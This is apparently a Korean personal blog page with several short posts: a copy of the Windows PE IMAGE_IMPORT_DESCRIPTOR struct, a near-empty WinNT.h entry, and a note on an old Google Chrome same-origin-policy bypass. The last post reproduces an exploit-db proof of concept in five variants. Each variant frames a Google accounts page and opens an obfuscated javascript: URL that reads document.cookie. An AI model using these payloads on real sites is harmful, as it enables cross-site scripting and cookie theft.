PIMAGE_IMPORT_DESCRIPTOR

windows 2010. 5. 24. 11:34 |
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;            // 0 for terminating null import descriptor
        DWORD   OriginalFirstThunk;         // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
    };
    DWORD   TimeDateStamp;                  // 0 if not bound,
                                            // -1 if bound, and real date\time stamp
                                            //     in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                                            // O.W. date/time stamp of DLL bound to (Old BIND)

    DWORD   ForwarderChain;                 // -1 if no forwarders
    DWORD   Name;
    DWORD   FirstThunk;                     // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;

'windows' 카테고리의 다른 글

IMAGE_THUNK_DATA32  (0) 2010.05.24
Windows Data Types  (0) 2010.05.24
WinNT.h  (0) 2010.05.24
GetModuleHandle과 LoadLibrary  (0) 2010.05.11
Toolhelp32를 이용한 프로세스ID얻기  (0) 2009.10.02
Posted by applicationlayer
:

WinNT.h

windows 2010. 5. 24. 08:57 |
야호

'windows' 카테고리의 다른 글

Windows Data Types  (0) 2010.05.24
PIMAGE_IMPORT_DESCRIPTOR  (0) 2010.05.24
GetModuleHandle과 LoadLibrary  (0) 2010.05.11
Toolhelp32를 이용한 프로세스ID얻기  (0) 2009.10.02
context switch  (0) 2009.10.01
Posted by applicationlayer
:

구글 크롬에서 발견된 동일 근원 정책(Same-Origin Policy) 정책 우회 취약점

SOP가 우회되는 브라우저를 사용하게되면 방문하는 모든 사이트가 XSS에 취약하게 된다.

poc는 다음과 같다. (출처:http://www.exploit-db.com/exploits/12657)
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe>
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

'vulnerability > sop' 카테고리의 다른 글

androind chrome sop bypass  (0) 2013.02.18
브라우저별 domain SOP허용범위  (0) 2013.02.12
Posted by applicationlayer
: